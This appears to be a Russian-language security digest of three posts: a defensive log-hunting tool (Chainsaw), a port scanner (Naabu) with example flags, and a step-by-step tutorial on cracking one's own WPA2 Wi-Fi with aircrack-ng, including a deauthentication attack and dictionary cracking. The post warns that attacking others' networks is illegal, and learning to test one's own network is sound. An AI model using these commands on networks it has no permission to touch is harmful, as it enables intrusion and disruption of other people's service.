X файлы 03.2026

Chainsaw — охота за угрозами в Windows-логах за секунды

p/photo_2026-03-17_15-29-45.jpg
19 марта 2026 (07:56:38)

Chainsaw — это мощный инструмент для быстрого поиска признаков компрометации в EVTX-логах Windows. Он прочесывает тонны событий, находит артефакты атак, детектит тактики из MITRE ATT&CK и подсвечивает аномалии. Идеален для Blue Team, SOC-аналитиков и тех, кто хочет понять, что происходило на системе после инцидента — скачал, запустил, получил отчёт.


Что важно:

➡️ Поиск по сигнатурам Sigma — использует огромную базу правил для обнаружения конкретных атак (PowerShell, WMI, RDP-брутфорс, Mimikatz)


➡️ Mapping на MITRE ATT&CK — сразу видно, какая тактика использовалась (TA0003 — Persistence, TA0005 — Defense Evasion)


➡️ Мгновенный анализ — папка с логами обрабатывается за секунды, даже если там гигабайты событий


➡️ Гибкая фильтрация — можно копать по времени, ID событий, хостам, ключевым словам


➡️ Вывод в понятном формате — JSON, CSV или красивый ASCII-отчёт с подсветкой опасного


👉 Качай и ищи следы (https://github.com/withSecureLabs/chainsaw)

Naabu — сканирование портов с космической скоростью

19 марта 2026 (07:54:50)

Naabu от ProjectDiscovery — это порт-сканер, который за секунды находит открытые порты на сотнях хостов. Работает как с SYN-сканированием (незаметно), так и с полным подключением. Идеален для реконна, когда нужно быстро понять, какие сервисы торчат наружу.


Что умеет:

➡️ SYN-сканирование — быстрое и малозаметное (не открывает полное соединение)


➡️ Массовая проверка — принимает список IP/доменов и сканирует тысячи целей параллельно


➡️ Определение сервисов — после находки порта можно сразу запустить баннер-граббин


Пример базовой команды:

naabu -host example.com -top-ports 1000


Полезные флаги:

naabu -list hosts.txt -rate 1000 -silent   # массовое сканирование с высокой скоростью

naabu -host 192.168.1.1 -p 1-65535         # сканирование всех портов

naabu -host example.com -service            # определение сервисов на открытых портах


🌐 Качай и сканируй (https://github.com/projectdiscovery/naabu)

Как я взломал свою Wi-Fi сеть за 10 минут (и ты сможешь)

19 марта 2026 (07:53:15)

Никакой магии, никакого хакерского кино. Только ноутбук, внешний Wi-Fi адаптер за 500 рублей и пара команд в терминале. WPA2 до сих пор живёт в каждой второй квартире, а большинство паролей — это просто слова из словаря. Проверил на своей сети — работает.


Что нужно:

🔴 Ноутбук с Linux или виртуалка

🔴 Wi-Fi адаптер с поддержкой monitor mode (Alfa AWUS036ACH — классика)

🔴 Установленный aircrack-ng (sudo apt install aircrack-ng)

🔴 Словарь паролей (rockyou.txt лежит в /usr/share/wordlists/)


Пошагово за 10 минут:


1. Включаем монитор-режим

   sudo airmon-ng start wlan0

   

   Интерфейс превращается в wlan0mon — теперь он видит весь эфир, а не только твою сеть .


2. Сканируем цели

   sudo airodump-ng wlan0mon

   

   На экране попрут все доступные сети. Находишь свою, записываешь BSSID (MAC-адрес точки) и канал (CH).


3. Ловим handshake

   sudo airodump-ng -c <канал> --bssid -w capture wlan0mon

   

   Теперь терминал висит и ждёт, пока кто-то подключится к сети. Но ждать можно вечность .


4. Форсируем переподключение (deauth attack)

   Открываешь второй терминал и отправляешь пакеты деаутентификации:

   sudo aireplay-ng --deauth 5 -a wlan0mon

   

   Это выкидывает всех клиентов из сети, они переподключаются автоматически — и в этот момент airodump-ng ловит заветный handshake . В первом терминале появится надпись WPA handshake: .


5. Взламываем пароль по словарю

   aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

   

   Если пароль был слабым — через пару секунд увидишь KEY FOUND! .


Важно:

🔴 Всё это легально только на своей сети. Чужие сети трогать — статья 272 УК РФ.

🟢 После эксперимента выключи монитор-режим:

   sudo airmon-ng stop wlan0mon

   sudo systemctl start NetworkManager

   


Вывод: 90% домашних сетей вскрываются за 10 минут, если пароль — не рандомная строка, а "qwerty123" или "password". Проверь свою — может, пора сменить?